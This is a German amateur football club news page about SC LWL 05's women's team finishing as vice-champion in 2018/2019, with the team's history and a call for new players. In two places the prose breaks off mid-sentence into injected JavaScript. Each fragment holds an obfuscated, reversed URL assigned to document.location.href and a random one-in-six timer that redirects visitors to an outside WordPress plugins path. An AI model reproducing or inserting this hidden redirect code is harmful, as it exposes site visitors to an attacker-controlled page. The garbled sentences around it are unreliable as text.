Skip to content Skip to main navigation Skip to footer

LWL – Damen werden Vizemeister der Saison 2018/2019

Im letzten Spiel der Saison 2018/2019 konnten sich die Damen des SC LWL 05 gegen den SC Drolshagen II in der Meisterrunde mit 2:0 durchsetzen.
Mit diesem Sieg sicherten sich die Damen vorzeitig die Vizemeisterschaft hinter Kreismeister SG Albaum/Heinsberg, die durch einen Sieg gegen die SG Lütringhausen/Kleusheim/Rahrbachtal (2:7) unangefochten die Meisterschaft klar machte.
Somit nimmt eine teilweise nicht optimale Hinrunde und eine bessere Rückrunde für die Damenmannschaft toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doch noch ein halbwegs gutes und zufriedenstellendes Ende.

Seit nunmehr 14 Jahren besteht eine Damenmannschaft im LWL. Die im Gründungsjahr 2005 ins Leben gerufene Damenmannschaft, hatte schnell Spielerinnen und Anhänger gefunden. Zu dieser Zeit bestand schon eine Mädchen-Jugendmannschaft aus der einige Spielerinnen hervor gingen.
Damals noch der Meinung vieler Eltern „aus dieser Mannschaft wird nix“ und „die Etablierung von Frauenfußball im Verein wird es schwer haben“ hat sich einiges getan.
Nach anfänglichen Schwierigkeiten spielte man in den Kreisen MK, Siegen und letztlich in der Kreisliga Olpe. In den Anfängen noch im hinteren Tabellenfeld zu finden, spielte man sich immer näher an die Tabellenspitze heran. Nach dem dritten Platz in der Saison 15/16 wurde in 16/17 der zweite und in der Saison 17/18 der Meistertitel erreicht.

Durch das Ausscheiden von insgesamt 5 Spielerinnen (aus sportlichen, beruflichen und familiären Gründen) wird die Personaldecke der Mannschaft für eine weitere Spielzeit sehr dünn. Mit umfangreichen Maßnahmen und Werbeaktionen versucht der LWL eine spielfähige Damenmannschaft für die Saison 2019/2020 zu bekommen.

Wenn eine Mannschaft im LWL gemeldet werden kann, wird dies in der kommenden Saison in der Kreisliga Lüdenscheid/Iserlohn stattfinden, da sich die Kreisliga Olpe auflösen wird.
Eine neue Herausforderung für die Mannschaft, da man tlw. auf neue unbekannte Mannschaften treffen wird.
Um dieses gewährleisten zu können, fehlen noch Spielerinnen die wir gerne aus dem Umfeld von Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn und Plettenberg werben möchten. (siehe Bericht vom 07.04.2019)

Direkter Ansprechpartner ist Manfred Scheppe unter der Nummer 016091239023